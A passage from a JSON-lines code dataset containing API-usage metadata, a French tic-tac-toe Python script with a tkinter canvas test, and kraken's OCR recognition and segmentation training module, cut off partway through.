"attribute"}, {"api_name": "colorama.Style", "line_number": 391, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 391, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 392, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 392, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 398, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 399, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 404, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 405, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 406, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 407, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 408, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 409, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 410, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 411, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 415, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 416, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 417, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 418, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 419, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 420, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 421, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 422, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 426, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 429, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 432, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 435, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 438, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 441, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 444, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 447, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 450, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 453, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 479, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 481, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 483, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 495, "usage_type": "call"}, {"api_name": "logging.PLAIN", "line_number": 496, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 502, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 508, "usage_type": "attribute"}, {"api_name": "logging.setLoggerClass", "line_number": 513, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 526, "usage_type": "call"}]} +{"seq_id": "380884730", "text": "'''\nDocumentation, License etc.\n\n@package projet_morpion\n'''\n\n# 1ère étape : Ecrire une fonction pour afficher le tableau de jeu. Configurer votre tableau comme une liste, où chaque index 1-9 correspond à un nombre sur un clavier, de sorte que vous obtenez un terrain de 3 par 3.\n\nfrom IPython.display import clear_output\n\ndef affiche_tableau(tableau):\n clear_output()\n print(\"Bienvenue dans le jeu du morpion : \\n\") \n print(' | |')\n print(' ' + tableau[7] + ' | ' + tableau[8] + ' | ' + tableau[9])\n print(' | |')\n print('-----------')\n print(' | |')\n print(' ' + tableau[4] + ' | ' + tableau[5] + ' | ' + tableau[6])\n print(' | |')\n print('-----------')\n print(' | |')\n print(' ' + tableau[1] + ' | ' + tableau[2] + ' | ' + tableau[3])\n print(' | |')\n\naffiche_tableau(['','X','X','X','O',' ','O','X','X','X'])\n\n# **2ème étape : Ecrire une fonction qui demande au joueur quelle marque «X» ou «O» il veut utiliser et lui assigner. Pensez à utiliser une boucle *while* pour demander une réponse au joueur jusqu'à obtenir une réponse correcte.** \n\ndef pion_joueur():\n \n marque = ''\n while not (marque == 'X' or marque == 'O'):\n marque = input('Joueur 1: Est-ce que vous voulez jouer X ou O ? ').upper()\n\n if marque == 'X':\n return ('X', 'O')\n else:\n return ('O', 'X') \n\n\n\n\n\nimport tkinter as Tk\nimport time\n\ndef affiche_canevas_tk() :\n N = 3 \n pas=600/N \n root = Tk.Tk() \n c = Tk.Canvas(root,height=600,width=600) \n listidrec=N*[[]] \n for i in range(N): \n listidrec[i]=N*[-1] \n for i in range(N): \n for j in range(N): \n listidrec[i][j] = c.create_rectangle(pas*i, pas*j, pas*(i+1), pas*(j+1), fill='#00FF00') \n \n c.pack()\n def test():\n for i in range(17,256):\n c.itemconfig(listidrec[1][1],fill='#0000'+hex(i)[2:])\n print(hex(i)[2:])\n time.sleep(0.05) \n root.update()\n \n \n b = Tk.Button(text = 'test', command= test)\n b.pack()\n root.mainloop()\n\n# affiche_canevas_tk()\n", "sub_path": "projet_morpion.py", "file_name": "projet_morpion.py", "file_ext": "py", "file_size_in_byte": 2106, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "IPython.display.clear_output", "line_number": 12, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 51, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "504846289", "text": "#\n# Copyright 2015 Benjamin Kiessling\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\"\"\"\nTraining loop interception helpers\n\"\"\"\nimport re\nimport torch\nimport pathlib\nimport logging\nimport warnings\nimport numpy as np\nimport torch.nn.functional as F\nimport pytorch_lightning as pl\n\nfrom functools import partial\nfrom torch.multiprocessing import Pool\nfrom torch.optim import lr_scheduler\nfrom typing import Callable, Dict, Optional, Sequence, Union, Any, List\nfrom pytorch_lightning.callbacks import Callback, EarlyStopping\n\nfrom kraken.lib import models, vgsl, default_specs, progress\nfrom kraken.lib.xml import preparse_xml_data\nfrom kraken.lib.util import make_printable\nfrom kraken.lib.codec import PytorchCodec\nfrom kraken.lib.dataset import (ArrowIPCRecognitionDataset, BaselineSet,\n GroundTruthDataset, PolygonGTDataset,\n ImageInputTransforms, compute_error,\n collate_sequences)\nfrom kraken.lib.models import validate_hyper_parameters\nfrom kraken.lib.exceptions import KrakenInputException, KrakenEncodeException\n\nfrom torch.utils.data import DataLoader, random_split, Subset\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef _star_fun(fun, kwargs):\n try:\n return fun(**kwargs)\n except FileNotFoundError as e:\n logger.warning(f'{e.strerror}: {e.filename}. Skipping.')\n except KrakenInputException as e:\n logger.warning(str(e))\n return None\n\n\nclass KrakenTrainer(pl.Trainer):\n def __init__(self,\n enable_progress_bar: bool = True,\n enable_summary: bool = True,\n min_epochs: int = 5,\n max_epochs: int = 100,\n pb_ignored_metrics: Sequence[str] = ('loss', 'val_metric'),\n move_metrics_to_cpu: bool = True,\n *args,\n **kwargs):\n kwargs['logger'] = False\n kwargs['enable_checkpointing'] = False\n kwargs['enable_progress_bar'] = enable_progress_bar\n kwargs['min_epochs'] = min_epochs\n kwargs['max_epochs'] = max_epochs\n kwargs['callbacks'] = ([] if 'callbacks' not in kwargs else kwargs['callbacks'])\n kwargs['move_metrics_to_cpu'] = move_metrics_to_cpu\n if not isinstance(kwargs['callbacks'], list):\n kwargs['callbacks'] = [kwargs['callbacks']]\n\n if enable_progress_bar:\n progress_bar_cb = progress.KrakenTrainProgressBar(ignored_metrics=pb_ignored_metrics)\n kwargs['callbacks'].append(progress_bar_cb)\n\n if enable_summary:\n from pytorch_lightning.callbacks import RichModelSummary\n summary_cb = RichModelSummary(max_depth=2)\n kwargs['callbacks'].append(summary_cb)\n kwargs['enable_model_summary'] = False\n\n kwargs['callbacks'].extend([KrakenSetOneChannelMode(), KrakenSaveModel()])\n super().__init__(*args, **kwargs)\n\n def fit(self, *args, **kwargs):\n with warnings.catch_warnings():\n warnings.filterwarnings(action='ignore', category=UserWarning,\n message='The dataloader,')\n super().fit(*args, **kwargs)\n\n\nclass KrakenSetOneChannelMode(Callback):\n \"\"\"\n Callback that sets the one_channel_mode of the model after the first epoch.\n \"\"\"\n def on_train_epoch_end(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> None:\n # fill one_channel_mode after 1 iteration over training data set\n if not trainer.sanity_checking and trainer.current_epoch == 0 and trainer.model.nn.model_type == 'recognition':\n ds = getattr(pl_module, 'train_set', None)\n if not ds and trainer.datamodule:\n ds = trainer.datamodule.train_set\n im_mode = ds.dataset.im_mode\n if im_mode in ['1', 'L']:\n logger.info(f'Setting model one_channel_mode to {im_mode}.')\n trainer.model.nn.one_channel_mode = im_mode\n\n\nclass KrakenSaveModel(Callback):\n \"\"\"\n Kraken's own serialization callback instead of pytorch's.\n \"\"\"\n def on_validation_end(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> None:\n if not trainer.sanity_checking:\n trainer.model.nn.hyper_params['completed_epochs'] += 1\n metric = float(trainer.logged_metrics['val_metric']) if 'val_metric' in trainer.logged_metrics else -1.0\n trainer.model.nn.user_metadata['accuracy'].append((trainer.global_step, metric))\n trainer.model.nn.user_metadata['metrics'].append((trainer.global_step, {k: float(v) for k, v in trainer.logged_metrics.items()}))\n\n logger.info('Saving to {}_{}'.format(trainer.model.output, trainer.current_epoch))\n trainer.model.nn.save_model(f'{trainer.model.output}_{trainer.current_epoch}.mlmodel')\n\n\nclass RecognitionModel(pl.LightningModule):\n def __init__(self,\n hyper_params: Dict[str, Any] = None,\n output: str = 'model',\n spec: str = default_specs.RECOGNITION_SPEC,\n append: Optional[int] = None,\n model: Optional[Union[pathlib.Path, str]] = None,\n reorder: Union[bool, str] = True,\n training_data: Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]] = None,\n evaluation_data: Optional[Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]]] = None,\n partition: Optional[float] = 0.9,\n binary_dataset_split: bool = False,\n num_workers: int = 1,\n load_hyper_parameters: bool = False,\n repolygonize: bool = False,\n force_binarization: bool = False,\n format_type: str = 'path',\n codec: Optional[Dict] = None,\n resize: str = 'fail'):\n \"\"\"\n A LightningModule encapsulating the training setup for a text\n recognition model.\n\n Setup parameters (load, training_data, evaluation_data, ....) are\n named, model hyperparameters (everything in\n `kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS`) are in in the\n `hyper_params` argument.\n\n Args:\n hyper_params (dict): Hyperparameter dictionary containing all fields\n from\n kraken.lib.default_specs.RECOGNITION_HYPER_PARAMS\n **kwargs: Setup parameters, i.e. CLI parameters of the train() command.\n \"\"\"\n super().__init__()\n hyper_params_ = default_specs.RECOGNITION_HYPER_PARAMS\n if model:\n logger.info(f'Loading existing model from {model} ')\n self.nn = vgsl.TorchVGSLModel.load_model(model)\n\n if self.nn.model_type not in [None, 'recognition']:\n raise ValueError(f'Model {model} is of type {self.nn.model_type} while `recognition` is expected.')\n\n if load_hyper_parameters:\n hp = self.nn.hyper_params\n else:\n hp = {}\n hyper_params_.update(hp)\n else:\n self.nn = None\n\n if hyper_params:\n hyper_params_.update(hyper_params)\n self.save_hyperparameters(hyper_params_)\n\n self.reorder = reorder\n self.append = append\n self.model = model\n self.num_workers = num_workers\n self.resize = resize\n self.format_type = format_type\n self.output = output\n\n self.best_epoch = 0\n self.best_metric = 0.0\n\n DatasetClass = GroundTruthDataset\n valid_norm = True\n if format_type in ['xml', 'page', 'alto']:\n logger.info(f'Parsing {len(training_data)} XML files for training data')\n training_data = preparse_xml_data(training_data, format_type, repolygonize)\n if evaluation_data:\n logger.info(f'Parsing {len(evaluation_data)} XML files for validation data')\n evaluation_data = preparse_xml_data(evaluation_data, format_type, repolygonize)\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n DatasetClass = PolygonGTDataset\n valid_norm = False\n elif format_type == 'binary':\n DatasetClass = ArrowIPCRecognitionDataset\n if repolygonize:\n logger.warning('Repolygonization enabled in `binary` mode. Will be ignored.')\n valid_norm = False\n logger.info(f'Got {len(training_data)} binary dataset files for training data')\n training_data = [{'file': file} for file in training_data]\n if evaluation_data:\n logger.info(f'Got {len(evaluation_data)} binary dataset files for validation data')\n evaluation_data = [{'file': file} for file in evaluation_data]\n elif format_type == 'path':\n if force_binarization:\n logger.warning('Forced binarization enabled in `path` mode. Will be ignored.')\n force_binarization = False\n if repolygonize:\n logger.warning('Repolygonization enabled in `path` mode. Will be ignored.')\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n logger.info(f'Got {len(training_data)} line strip images for training data')\n training_data = [{'image': im} for im in training_data]\n if evaluation_data:\n logger.info(f'Got {len(evaluation_data)} line strip images for validation data')\n evaluation_data = [{'image': im} for im in evaluation_data]\n valid_norm = True\n # format_type is None. Determine training type from length of training data entry\n elif not format_type:\n if len(training_data[0]) >= 4:\n DatasetClass = PolygonGTDataset\n valid_norm = False\n else:\n if force_binarization:\n logger.warning('Forced binarization enabled with box lines. Will be ignored.')\n force_binarization = False\n if repolygonize:\n logger.warning('Repolygonization enabled with box lines. Will be ignored.')\n if binary_dataset_split:\n logger.warning('Internal binary dataset splits are enabled but using non-binary dataset files. Will be ignored.')\n binary_dataset_split = False\n else:\n raise ValueError(f'format_type {format_type} not in [alto, page, xml, path, binary].')\n\n spec = spec.strip()\n if spec[0] != '[' or spec[-1] != ']':\n raise ValueError(f'VGSL spec {spec} not bracketed')\n self.spec = spec\n # preparse input sizes from vgsl string to seed ground truth data set\n # sizes and dimension ordering.\n if not self.nn:\n blocks = spec[1:-1].split(' ')\n m = re.match(r'(\\d+),(\\d+),(\\d+),(\\d+)', blocks[0])\n if not m:\n raise ValueError(f'Invalid input spec {blocks[0]}')\n batch, height, width, channels = [int(x) for x in m.groups()]\n else:\n batch, channels, height, width = self.nn.input\n\n self.transforms = ImageInputTransforms(batch,\n height,\n width,\n channels,\n self.hparams.pad,\n valid_norm,\n force_binarization)\n\n self.example_input_array = torch.Tensor(batch,\n channels,\n height if height else 32,\n width if width else 400)\n\n if 'file_system' in torch.multiprocessing.get_all_sharing_strategies():\n logger.debug('Setting multiprocessing tensor sharing strategy to file_system')\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n if evaluation_data:\n train_set = self._build_dataset(DatasetClass, training_data)\n self.train_set = Subset(train_set, range(len(train_set)))\n val_set = self._build_dataset(DatasetClass, evaluation_data)\n self.val_set = Subset(val_set, range(len(val_set)))\n elif binary_dataset_split:\n train_set = self._build_dataset(DatasetClass, training_data, split_filter='train')\n self.train_set = Subset(train_set, range(len(train_set)))\n val_set = self._build_dataset(DatasetClass, training_data, split_filter='validation')\n self.val_set = Subset(val_set, range(len(val_set)))\n logger.info(f'Found {len(self.train_set)} (train) / {len(self.val_set)} (val) samples in pre-encoded dataset')\n else:\n train_set = self._build_dataset(DatasetClass, training_data)\n train_len = int(len(train_set)*partition)\n val_len = len(train_set) - train_len\n logger.info(f'No explicit validation data provided. Splitting off '\n f'{val_len} (of {len(train_set)}) samples to validation '\n 'set. (Will disable alphabet mismatch detection.)')\n self.train_set, self.val_set = random_split(train_set, (train_len, val_len))\n\n if len(self.train_set) == 0 or len(self.val_set) == 0:\n raise ValueError('No valid training data was provided to the train '\n 'command. Please add valid XML, line, or binary data.')\n\n logger.info(f'Training set {len(self.train_set)} lines, validation set '\n f'{len(self.val_set)} lines, alphabet {len(train_set.alphabet)} '\n 'symbols')\n alpha_diff_only_train = set(self.train_set.dataset.alphabet).difference(set(self.val_set.dataset.alphabet))\n alpha_diff_only_val = set(self.val_set.dataset.alphabet).difference(set(self.train_set.dataset.alphabet))\n if alpha_diff_only_train:\n logger.warning(f'alphabet mismatch: chars in training set only: '\n f'{alpha_diff_only_train} (not included in accuracy test '\n 'during training)')\n if alpha_diff_only_val:\n logger.warning(f'alphabet mismatch: chars in validation set only: {alpha_diff_only_val} (not trained)')\n logger.info('grapheme\\tcount')\n for k, v in sorted(train_set.alphabet.items(), key=lambda x: x[1], reverse=True):\n char = make_printable(k)\n if char == k:\n char = '\\t' + char\n logger.info(f'{char}\\t{v}')\n\n if codec:\n logger.info('Instantiating codec')\n self.codec = PytorchCodec(codec)\n for k, v in self.codec.c2l.items():\n char = make_printable(k)\n if char == k:\n char = '\\t' + char\n logger.info(f'{char}\\t{v}')\n else:\n self.codec = None\n\n logger.info('Encoding training set')\n\n def _build_dataset(self,\n DatasetClass,\n training_data,\n **kwargs):\n dataset = DatasetClass(normalization=self.hparams.normalization,\n whitespace_normalization=self.hparams.normalize_whitespace,\n reorder=self.reorder,\n im_transforms=self.transforms,\n augmentation=self.hparams.augment,\n **kwargs)\n\n if (self.num_workers and self.num_workers > 1) and self.format_type != 'binary':\n with Pool(processes=self.num_workers) as pool:\n for im in pool.imap_unordered(partial(_star_fun, dataset.parse), training_data, 5):\n logger.debug(f'Adding sample {im} to training set')\n if im:\n dataset.add(**im)\n else:\n for im in training_data:\n try:\n dataset.add(**im)\n except KrakenInputException as e:\n logger.warning(str(e))\n if self.format_type == 'binary' and self.hparams.normalization:\n logger.debug('Rebuilding dataset using unicode normalization')\n dataset.rebuild_alphabet()\n return dataset\n\n def forward(self, x, seq_lens=None):\n return self.net(x, seq_lens)\n\n def training_step(self, batch, batch_idx):\n input, target = batch['image'], batch['target']\n # sequence batch\n if 'seq_lens' in batch:\n seq_lens, label_lens = batch['seq_lens'], batch['target_lens']\n target = (target, label_lens)\n o = self.net(input, seq_lens)\n else:\n o = self.net(input)\n\n seq_lens = o[1]\n output = o[0]\n target_lens = target[1]\n target = target[0]\n # height should be 1 by now\n if output.size(2) != 1:\n raise KrakenInputException('Expected dimension 3 to be 1, actual {}'.format(output.size(2)))\n output = output.squeeze(2)\n # NCW -> WNC\n loss = self.nn.criterion(output.permute(2, 0, 1), # type: ignore\n target,\n seq_lens,\n target_lens)\n return loss\n\n def validation_step(self, batch, batch_idx):\n chars, error = compute_error(self.rec_nn, batch)\n chars = torch.tensor(chars)\n error = torch.tensor(error)\n return {'chars': chars, 'error': error}\n\n def validation_epoch_end(self, outputs):\n chars = torch.stack([x['chars'] for x in outputs]).sum()\n error = torch.stack([x['error'] for x in outputs]).sum()\n accuracy = (chars - error) / (chars + torch.finfo(torch.float).eps)\n if accuracy > self.best_metric:\n logger.debug(f'Updating best metric from {self.best_metric} ({self.best_epoch}) to {accuracy} ({self.current_epoch})')\n self.best_epoch = self.current_epoch\n self.best_metric = accuracy\n logger.info(f'validation run: total chars {chars} errors {error} accuracy {accuracy}')\n self.log_dict({'val_accuracy': accuracy, 'val_metric': accuracy}, prog_bar=True)\n\n def setup(self, stage: Optional[str] = None):\n # finalize models in case of appending/loading\n if stage in [None, 'fit']:\n if self.append:\n self.train_set.dataset.encode(self.codec)\n # now we can create a new model\n self.spec = '[{} O1c{}]'.format(self.spec[1:-1], self.train_set.dataset.codec.max_label + 1)\n logger.info(f'Appending {self.spec} to existing model {self.nn.spec} after {self.append}')\n self.nn.append(self.append, self.spec)\n self.nn.add_codec(self.train_set.dataset.codec)\n logger.info(f'Assembled model spec: {self.nn.spec}')\n elif self.model:\n self.spec = self.nn.spec\n\n # prefer explicitly given codec over network codec if mode is 'both'\n codec = self.codec if (self.codec and self.resize == 'both') else self.nn.codec\n\n codec.strict = True\n\n try:\n self.train_set.dataset.encode(codec)\n except KrakenEncodeException:\n alpha_diff = set(self.train_set.dataset.alphabet).difference(\n set(codec.c2l.keys())\n )\n alpha_diff_val = set(self.val_set.dataset.alphabet).difference(\n set(codec.c2l.keys())\n )\n if self.resize == 'fail':\n raise KrakenInputException(f'Training data and model codec alphabets mismatch: {alpha_diff}')\n elif self.resize == 'add':\n logger.info(f'Resizing codec to include '\n f'{len(alpha_diff.union(alpha_diff_val))} new code points')\n # Add the characters in val only\n codec = codec.add_labels(alpha_diff.union(alpha_diff_val))\n self.nn.add_codec(codec)\n logger.info(f'Resizing last layer in network to {codec.max_label+1} outputs')\n self.nn.resize_output(codec.max_label + 1)\n self.train_set.dataset.encode(self.nn.codec)\n elif self.resize == 'both':\n logger.info(f'Resizing network or given codec to '\n f'{len(self.train_set.dataset.alphabet)+len(self.val_set.dataset.alphabet)} '\n f'code sequences')\n self.train_set.dataset.encode(None)\n ncodec, del_labels = codec.merge(self.train_set.dataset.codec)\n # Add the characters in val only\n val_diff = set(self.val_set.dataset.alphabet).difference(\n set(ncodec.c2l.keys())\n )\n ncodec.add_labels(val_diff)\n # Switch codec.\n self.nn.add_codec(ncodec)\n logger.info(f'Deleting {len(del_labels)} output classes from network '\n f'({len(codec)-len(del_labels)} retained)')\n self.train_set.dataset.encode(ncodec)\n self.nn.resize_output(ncodec.max_label + 1, del_labels)\n else:\n raise ValueError(f'invalid resize parameter value {self.resize}')\n\n self.nn.codec.strict = False\n\n else:\n self.train_set.dataset.encode(self.codec)\n logger.info(f'Creating new model {self.spec} with {self.train_set.dataset.codec.max_label+1} outputs')\n self.spec = '[{} O1c{}]'.format(self.spec[1:-1], self.train_set.dataset.codec.max_label + 1)\n self.nn = vgsl.TorchVGSLModel(self.spec)\n # initialize weights\n self.nn.init_weights()\n self.nn.add_codec(self.train_set.dataset.codec)\n\n self.val_set.dataset.encode(self.nn.codec)\n\n if self.nn.one_channel_mode and self.train_set.dataset.im_mode != self.nn.one_channel_mode:\n logger.warning(f'Neural network has been trained on mode {self.nn.one_channel_mode} images, '\n f'training set contains mode {self.train_set.dataset.im_mode} data. Consider setting `force_binarization`')\n\n if self.format_type != 'path' and self.nn.seg_type == 'bbox':\n logger.warning('Neural network has been trained on bounding box image information but training set is polygonal.')\n\n self.nn.hyper_params = self.hparams\n self.nn.model_type = 'recognition'\n\n if not self.nn.seg_type:\n logger.info(f'Setting seg_type to {self.train_set.dataset.seg_type}.')\n self.nn.seg_type = self.train_set.dataset.seg_type\n\n self.rec_nn = models.TorchSeqRecognizer(self.nn, train=None, device=None)\n self.net = self.nn.nn\n\n torch.set_num_threads(max(self.num_workers, 1))\n\n def train_dataloader(self):\n return DataLoader(self.train_set,\n batch_size=self.hparams.batch_size,\n num_workers=self.num_workers,\n pin_memory=True,\n shuffle=True,\n collate_fn=collate_sequences)\n\n def val_dataloader(self):\n return DataLoader(self.val_set,\n shuffle=False,\n batch_size=self.hparams.batch_size,\n num_workers=self.num_workers,\n pin_memory=True,\n collate_fn=collate_sequences)\n\n def configure_callbacks(self):\n callbacks = []\n if self.hparams.quit == 'early':\n callbacks.append(EarlyStopping(monitor='val_accuracy',\n mode='max',\n patience=self.hparams.lag,\n stopping_threshold=1.0))\n return callbacks\n\n # configuration of optimizers and learning rate schedulers\n # --------------------------------------------------------\n #\n # All schedulers are created internally with a frequency of step to enable\n # batch-wise learning rate warmup. In lr_scheduler_step() calls to the\n # scheduler are then only performed at the end of the epoch.\n def configure_optimizers(self):\n return _configure_optimizer_and_lr_scheduler(self.hparams,\n self.nn.nn.parameters(),\n len_train_set=len(self.train_set),\n loss_tracking_mode='max')\n\n def optimizer_step(self, epoch, batch_idx, optimizer, optimizer_idx,\n optimizer_closure, on_tpu=False, using_native_amp=False,\n using_lbfgs=False):\n # update params\n optimizer.step(closure=optimizer_closure)\n\n # linear warmup between 0 and the initial learning rate `lrate` in `warmup`\n # steps.\n if self.hparams.warmup and self.trainer.global_step < self.hparams.warmup:\n lr_scale = min(1.0, float(self.trainer.global_step + 1) / self.hparams.warmup)\n for pg in optimizer.param_groups:\n pg[\"lr\"] = lr_scale * self.hparams.lrate\n\n def lr_scheduler_step(self, scheduler, optimizer_idx, metric):\n if not self.hparams.warmup or self.trainer.global_step >= self.hparams.warmup:\n # step OneCycleLR each batch if not in warmup phase\n if isinstance(scheduler, lr_scheduler.OneCycleLR):\n scheduler.step()\n # step every other scheduler epoch-wise\n elif self.trainer.is_last_batch:\n scheduler.step()\n\n\nclass SegmentationModel(pl.LightningModule):\n def __init__(self,\n hyper_params: Dict = None,\n load_hyper_parameters: bool = False,\n progress_callback: Callable[[str, int], Callable[[None], None]] = lambda string, length: lambda: None,\n message: Callable[[str], None] = lambda *args, **kwargs: None,\n output: str = 'model',\n spec: str = default_specs.SEGMENTATION_SPEC,\n model: Optional[Union[pathlib.Path, str]] = None,\n training_data: Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]] = None,\n evaluation_data: Optional[Union[Sequence[Union[pathlib.Path, str]], Sequence[Dict[str, Any]]]] = None,\n partition: Optional[float] = 0.9,\n num_workers: int = 1,\n force_binarization: bool = False,\n format_type: str = 'path',\n suppress_regions: bool = False,\n suppress_baselines: bool = False,\n valid_regions: Optional[Sequence[str]] = None,\n valid_baselines: Optional[Sequence[str]] = None,\n merge_regions: Optional[Dict[str, str]] = None,\n merge_baselines: Optional[Dict[str, str]] = None,\n bounding_regions: Optional[Sequence[str]] = None,\n resize: str = 'fail',\n topline: Union[bool, None] = False):\n \"\"\"\n A LightningModule encapsulating the training setup for a page\n segmentation model.\n\n Setup parameters (load, training_data, evaluation_data, ....) are\n named, model hyperparameters (everything in\n `kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS`) are in in the\n `hyper_params` argument.\n\n Args:\n hyper_params (dict): Hyperparameter dictionary containing all fields\n from\n kraken.lib.default_specs.SEGMENTATION_HYPER_PARAMS\n **kwargs: Setup parameters, i.e. CLI parameters of the segtrain() command.\n \"\"\"\n\n super().__init__()\n\n self.best_epoch = 0\n self.best_metric = 0.0\n\n self.model = model\n self.num_workers = num_workers\n self.resize = resize\n self.format_type = format_type\n self.output = output\n self.bounding_regions = bounding_regions\n self.topline = topline\n\n hyper_params_ = default_specs.SEGMENTATION_HYPER_PARAMS\n\n if model:\n logger.info(f'Loading existing model from {model}')\n self.nn = vgsl.TorchVGSLModel.load_model(model)\n\n if self.nn.model_type not in [None, 'segmentation']:\n raise ValueError(f'Model {model} is of type {self.nn.model_type} while `segmentation` is expected.')\n\n if load_hyper_parameters:\n hp = self.nn.hyper_params\n else:\n hp = {}\n hyper_params_.update(hp)\n batch, channels, height, width = self.nn.input\n else:\n self.nn = None\n\n spec = spec.strip()\n if spec[0] != '[' or spec[-1] != ']':\n raise ValueError(f'VGSL spec \"{spec}\" not bracketed')\n self.spec = spec\n blocks = spec[1:-1].split(' ')\n m = re.match(r'(\\d+),(\\d+),(\\d+),(\\d+)', blocks[0])\n if not m:\n raise ValueError(f'Invalid input spec {blocks[0]}')\n batch, height, width, channels = [int(x) for x in m.groups()]\n\n if hyper_params:\n hyper_params_.update(hyper_params)\n\n validate_hyper_parameters(hyper_params_)\n self.save_hyperparameters(hyper_params_)\n\n if not training_data:\n raise ValueError('No training data provided. Please add some.')\n\n transforms = ImageInputTransforms(batch, height, width, channels, 0, valid_norm=False, force_binarization=force_binarization)\n\n self.example_input_array = torch.Tensor(batch,\n channels,\n height if height else 400,\n width if width else 300)\n\n # set multiprocessing tensor sharing strategy\n if 'file_system' in torch.multiprocessing.get_all_sharing_strategies():\n logger.debug('Setting multiprocessing tensor sharing strategy to file_system')\n torch.multiprocessing.set_sharing_strategy('file_system')\n\n if not valid_regions:\n valid_regions = None\n if not valid_baselines:\n valid_baselines = None\n\n if suppress_regions:\n valid_regions = []\n merge_regions = None\n if suppress_baselines:\n valid_baselines = []\n merge_baselines = None\n\n train_set = BaselineSet(training_data,\n line_width=self.hparams.line_width,\n im_transforms=transforms,\n mode=format_type,\n augmentation=self.hparams.augment,\n valid_baselines=valid_baselines,\n merge_baselines=merge_baselines,\n valid_regions=valid_regions,\n merge_regions=merge_regions)\n\n if format_type is None:\n for page in training_data:\n train_set.add(**page)\n\n if evaluation_data:\n val_set = BaselineSet(evaluation_data,\n line_width=self.hparams.line_width,\n im_transforms=transforms,\n mode=format_type,\n augmentation=False,\n valid_baselines=valid_baselines,\n merge_baselines=merge_baselines,\n valid_regions=valid_regions,\n merge_regions=merge_regions)\n\n if format_type is None:\n for page in evaluation_data:\n val_set.add(**page)\n\n train_set = Subset(train_set, range(len(train_set)))\n val_set = Subset(val_set, range(len(val_set)))\n else:\n train_len = int(len(train_set)*partition)\n val_len = len(train_set) - train_len\n logger.info(f'No explicit validation data provided. Splitting off '\n f'{val_len} (of {len(train_set)}) samples to validation '\n 'set.')\n train_set, val_set = random_split(train_set, (train_len, val_len))\n\n if len(train_set) == 0:\n raise ValueError('No valid training data provided. Please add some.')\n\n if len(val_set) == 0:\n raise ValueError('No valid validation data provided. Please add some.')\n\n # overwrite class mapping in validation set\n val_set.dataset.num_classes = train_set.dataset.num_classes\n val_set.dataset.class_mapping = train_set.dataset.class_mapping\n\n self.train_set = train_set\n self.val_set = val_set\n\n def forward(self, x):\n return self.nn.nn(x)\n\n def training_step(self, batch, batch_idx):\n input, target = batch['image'], batch['target']\n output, _ = self.nn.nn(input)\n output = F.interpolate(output, size=(target.size(2), target.size(3)))\n loss = self.nn.criterion(output, target)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch['image'], batch['target']\n pred, _ = self.nn.nn(x)\n # scale target to output size\n y = F.interpolate(y, size=(pred.size(2), pred.size(3))).squeeze(0).bool()\n 